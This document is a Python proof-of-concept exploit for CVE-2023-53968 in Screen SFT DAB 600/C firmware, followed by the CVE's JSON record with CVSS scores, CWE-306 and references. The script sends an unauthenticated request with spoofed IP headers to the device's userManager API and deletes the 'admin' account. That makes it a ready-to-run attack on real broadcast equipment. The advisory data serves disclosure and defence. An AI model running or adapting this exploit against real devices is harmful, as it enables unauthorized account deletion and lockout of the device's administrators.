CVE-2023-53968

import requests import time # CVE-2023-53968 PoC - Screen SFT DAB Authentication Bypass # Target: Screen SFT DAB 600/C Firmware 1.9.3 # Vulnerability: Session management flaw allows IP-based session hijacking target_ip = "192.168.1.100" # Target device IP target_port = 8080 def exploit_user_deletion(): """ Exploit the IP-based session binding vulnerability to delete user accounts without authentication """ # Craft the request using the target's IP in headers # The vulnerable firmware only checks IP, not session tokens headers = { 'X-Forwarded-For': target_ip, 'X-Real-IP': target_ip, 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' } # Target userManager API endpoint url = f"http://{target_ip}:{target_port}/api/userManager/deleteUser" # Payload to delete a user account payload = { "username": "admin", # Target user to delete "force": True } try: print(f"[*] Sending malicious request to {url}") print(f"[*] Using spoofed IP: {target_ip}") # Send the request without any authentication response = requests.post(url, json=payload, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") if response.status_code == 200: print("[+] User account deletion successful!") print("[+] Authentication bypass confirmed") else: print("[-] Exploitation failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=" * 50) print("CVE-2023-53968 PoC") print("Screen SFT DAB Firmware Authentication Bypass") print("=" * 50) exploit_user_deletion()

{"cve": {"id": "CVE-2023-53968", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:01.550", "lastModified": "2025-12-26T16:45:48.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 600/C Firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to remove user accounts without proper authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "B51EAD42-9B3F-44D5-973A-4758498D1339"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], "references": [{"url": "https://www.dbbroadcast.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51457", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/screen-sft-dab-c-firmware-authentication-bypass-erase-account", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}